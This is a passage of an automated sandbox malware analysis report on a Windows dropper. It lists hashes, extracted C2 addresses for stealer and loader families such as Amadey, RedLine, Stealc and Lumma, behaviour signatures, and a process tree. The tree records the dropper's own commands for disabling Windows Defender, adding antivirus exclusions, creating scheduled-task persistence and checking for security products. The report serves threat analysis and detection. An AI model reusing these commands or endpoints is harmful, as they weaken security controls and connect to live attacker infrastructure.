Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Resubmissions

21-09-2024 14:03

240921-rcvgnswbjc 10

21-09-2024 14:02

240921-rcclvswdkp 10

19-09-2024 22:36

240919-2jfxzavbkh 10

Analysis

  • max time kernel
    221s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-09-2024 22:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    678e3c75154bedc191abb4f8571c2995d5c4eda733eae9425714b9c9df241481.exe

  • Size

    1.8MB

  • MD5

    1bcbea527033a37d2ad097f1e308cc9a

  • SHA1

    100bd0670891ded1c349e07a314646b9d1e91c22

  • SHA256

    678e3c75154bedc191abb4f8571c2995d5c4eda733eae9425714b9c9df241481

  • SHA512

    7ec2c722efc234efa6dcf886adc6d06c82a860cd1ac1ed63a137eb767e59227ea40150b5d8ee093bd51fdb1b70ecd967fcc70f96b6fa1d1fe213e1b602b0172d

  • SSDEEP

    49152:byylb588O4NhbiEAQNle/H/rPz50lHuJ5Jpu:J5vbhbiE/N4frPcWr

Score
10/10
amadeycryptbotgcleanerlummaredlinestealczharkbot@oleh_pspbundledefaultdefault2fed3aalivetrafficravetg cloud @rlreborn admin @fatherofcardersbotnetcredential_accessdefense_evasiondiscoveryevasionexecutioninfostealerloaderpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top
Attributes
  • url_path

    /v1/upload.php

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

gcleaner

C2

80.66.75.114

45.91.200.135

Extracted

Family

stealc

Botnet

rave

C2

http://185.215.113.103

Attributes
  • url_path

    /e2b1563c6670f193.php

Extracted

Family

lumma

C2

https://contractowno.shop/api

https://chickerkuso.shop/api

https://achievenmtynwjq.shop/api

https://puredoffustow.shop/api

https://opponnentduei.shop/api

https://metallygaricwo.shop/api

https://milldymarskwom.shop/api

https://quotamkdsdqo.shop/api

https://carrtychaintnyw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Detects ZharkBot payload 2 IoCs

    ZharkBot is a botnet written C++.

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

    botnetzharkbot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • .NET Reactor proctector 6 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 17 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Indirect Command Execution 1 TTPs 34 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 13 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 15 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 52 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 23 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3440
      • C:\Users\Admin\AppData\Local\Temp\678e3c75154bedc191abb4f8571c2995d5c4eda733eae9425714b9c9df241481.exe
        "C:\Users\Admin\AppData\Local\Temp\678e3c75154bedc191abb4f8571c2995d5c4eda733eae9425714b9c9df241481.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4364
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4868
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3624
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3752
            • C:\Users\Admin\AppData\Roaming\LhO4vvb5us.exe
              "C:\Users\Admin\AppData\Roaming\LhO4vvb5us.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2164
            • C:\Users\Admin\AppData\Roaming\VIoXf2ZPdl.exe
              "C:\Users\Admin\AppData\Roaming\VIoXf2ZPdl.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1912
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:1036
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Checks processor information in registry
                PID:796
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4468
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3336
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:4208
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4272
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              PID:4300
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2768
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1380
            • C:\Users\Admin\AppData\Local\Temp\filename.exe
              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
              5⤵
              • Executes dropped EXE
              PID:4116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 520
                6⤵
                • Program crash
                PID:1316
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 552
                6⤵
                • Program crash
                PID:364
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 772
                6⤵
                • Program crash
                PID:1068
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 828
                6⤵
                • Program crash
                PID:4368
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 848
                6⤵
                • Program crash
                PID:1372
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 872
                6⤵
                • Program crash
                PID:3052
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1000
                6⤵
                • Program crash
                PID:3752
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1104
                6⤵
                • Program crash
                PID:2488
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1136
                6⤵
                • Program crash
                PID:704
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1176
                6⤵
                • Program crash
                PID:5588
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 1676
              5⤵
              • Program crash
              PID:5944
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              5⤵
                PID:236
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 368
                  6⤵
                  • Program crash
                  PID:1860
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:1856
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                  PID:200
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4412
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa opssvc"
                    6⤵
                      PID:908
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      6⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1004
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:1992
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 607698
                      6⤵
                        PID:2444
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "MaskBathroomCompositionInjection" Participants
                        6⤵
                          PID:4784
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1416
                        • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                          Waters.pif Q
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3108
                          • C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4408
                            • C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
                              "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
                              8⤵
                              • Sets service image path in registry
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • System Location Discovery: System Language Discovery
                              PID:1992
                          • C:\Users\Admin\AppData\Local\Temp\1000412001\66ea90ff1fefe_15.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000412001\66ea90ff1fefe_15.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:5844
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              8⤵
                                PID:1708
                            • C:\Users\Admin\AppData\Local\Temp\1000413001\channel3.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000413001\channel3.exe"
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Checks processor information in registry
                              PID:6856
                          • C:\Windows\SysWOW64\choice.exe
                            choice /d y /t 5
                            6⤵
                              PID:4216
                        • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:380
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4924
                        • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4488
                          • C:\Users\Admin\AppData\Local\Temp\7zS848.tmp\Install.exe
                            .\Install.exe
                            5⤵
                            • Executes dropped EXE
                            PID:4552
                            • C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe
                              .\Install.exe /RNXdidDHt "385121" /S
                              6⤵
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Enumerates system info in registry
                              PID:2396
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                7⤵
                                  PID:2644
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:3428
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      9⤵
                                        PID:4920
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                          10⤵
                                            PID:4820
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:4548
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          9⤵
                                            PID:1992
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                              10⤵
                                                PID:2444
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                            8⤵
                                            • Indirect Command Execution
                                            PID:4784
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              9⤵
                                                PID:956
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                  10⤵
                                                    PID:1428
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                8⤵
                                                • Indirect Command Execution
                                                PID:2452
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  9⤵
                                                    PID:4088
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      10⤵
                                                        PID:4968
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    8⤵
                                                    • Indirect Command Execution
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1372
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      9⤵
                                                        PID:32
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          10⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1420
                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            11⤵
                                                              PID:996
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                      7⤵
                                                      • Indirect Command Execution
                                                      PID:2516
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1004
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          9⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3112
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            10⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4840
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe\" PV /fIoVdidKuTF 385121 /S" /V1 /F
                                                      7⤵
                                                      • Drops file in Windows directory
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:916
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 680
                                                      7⤵
                                                      • Program crash
                                                      PID:3240
                                              • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                                4⤵
                                                • Drops startup file
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious behavior: AddClipboardFormatListener
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4272
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:4856
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:5780
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:6084
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6020
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                                  5⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4324
                                                • C:\Users\Admin\AppData\Local\Temp\pdxqta.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\pdxqta.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2428
                                                  • C:\Users\Admin\Documents\UnRAR.exe
